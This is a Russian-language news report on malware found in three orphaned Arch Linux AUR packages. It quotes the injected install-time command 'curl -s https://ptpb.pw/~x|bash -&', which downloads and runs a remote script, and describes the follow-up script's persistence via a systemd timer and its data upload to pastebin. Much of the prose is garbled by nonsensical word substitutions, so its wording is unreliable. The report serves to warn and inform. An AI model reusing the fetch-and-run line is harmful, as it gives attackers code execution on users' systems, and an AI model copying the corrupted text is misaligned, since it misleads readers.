В AUR-репозитории Arch Linux найдено вредоносное ПО

В AUR-рeпoзитoрии Arch Linux, в кoтoрoм рaзмeщaются нe вxoдящиe в дистрибутив пaкeты oт стoрoнниx рaзрaбoтчикoв, нaйдeны три пaкeтa, сoдeржaщиe врeдoнoсныe вставки. Осложнение выявлена в пакетах acroread 9.5.5-8 (Adobe PDF Reader), balz 1.20-3 (обслуживающая программа для сжатия файлов) и minergate 8.1-2 (GUI в целях майнинга криптовалют). В данные пакеты был добавлен адрес для загрузки и запуска скрипта с внешнего сервера, активируемый кайфовый время установки пакетов. 7 июля в пакеты были внесены изменения, в результате которых в обложка PKGBUILD был добавлен код "curl -s https://ptpb.pw/~x|bash -&" вызываемый в секции установки пакета. Предписанный скрипт выполнял загрузку другого скрипта "https://ptpb.pw/~u", устанавливал его наравне /usr/lib/xeactor/u.sh и активировал через периодический затребование по таймеру (создавался файл /usr/lib/systemd/system/xeactor.timer). В скрипте u.sh присутствовал адрес для отправки сведений о системе и установленных пакетах после сервис pastebin.com, а также для создания файла compromised.txt в домашних директориях всех пользователей. Вопреки на то, что вредоносный адрес ограничивался отправкой сведений о системе, ничто безлюдный (=малолюдный) мешает злоумышленникам в любой момент заместить содержимое u.sh. Например, на первом этапе злоумышленниками был в силах проводиться анализ наиболее популярных системных окружений с целью подбора оптимального угоду кому) большинства поражённых систем кода во (избежание майнинга криптовалют или требующего обмен вредоносного шифровальщика. Изменения были внесены пользователем xeactor в пакеты, имеющие положение orphaned, т.е. AUR позволяет любому желающему продлевать разработку orphane-пакетов, чем и воспользовался правонарушитель. Разработчики дистрибутива много раз предупреждали пользователей, ровно к пакетам из AUR (также справедливо с целью PPA и прочих репозиториев, в которых сторонние пользователи могут уставлять свои пакеты) следует относиться с осторожностью и соответственно возможности проверять содержимое файла PKGBUILD. Заковырка была выявлена в течение нескольких часов по времени модификации пакетов. Изменение было враз отклонено, а учётная запись разработчика xeactor заблокирована. Основа: http://www.opennet.ru/opennews/art.shtml?num=48948